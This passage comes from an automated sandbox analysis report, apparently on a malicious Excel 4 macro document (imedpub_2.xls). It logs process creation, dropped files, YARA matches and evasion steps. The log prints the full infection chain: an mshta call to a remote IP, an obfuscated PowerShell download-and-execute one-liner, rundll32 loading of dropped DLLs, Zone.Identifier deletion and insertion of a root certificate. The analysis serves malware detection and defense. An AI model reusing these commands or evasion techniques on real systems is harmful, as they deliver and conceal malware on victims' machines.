                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E249 DeleteService,12_2_0035E249
                            Source: imedpub_2.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: imedpub_2.xls, type: SAMPLEMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPEDMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vnljigstknrhjwnk\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: imedpub_2.xlsOLE indicator, VBA macros: true
                            Source: imedpub_2.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/9@3/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: imedpub_2.xlsOLE indicator, Workbook stream: true
                            Source: imedpub_2.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: imedpub_2.xlsReversingLabs: Detection: 27%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P.c.............................P.c.....................`I.........v.....................K........D.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k..... ..............................}..v............0.................D.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................I..k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................I..k....................................}..v....h.......0.................D.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..................k....................................}..v.....8......0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..................k......D.............................}..v.....9......0.................D.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'..................k....E...............................}..v............0...............h.D.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..................k....E...............................}..v....@.......0...............h.D.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.......................:.......................Jump to behavior
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zqqw/zaas/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.htmlJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zqqw/zaas/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDDJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDDJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupArJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGheJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVhJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDE7C.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdbG source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
                            Source: 48F2.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029200C4 push 8B4901F9h; iretd 4_3_029200CA
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029208C5 push 8B4901F9h; iretd 4_3_029208CA
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029200C4 push 8B4901F9h; iretd 4_3_029200CA
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029208C5 push 8B4901F9h; iretd 4_3_029208CA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FF00280A21 pushad ; ret 6_2_000007FF00280B61
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: QWER.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x8882a
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr (copy)Jump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
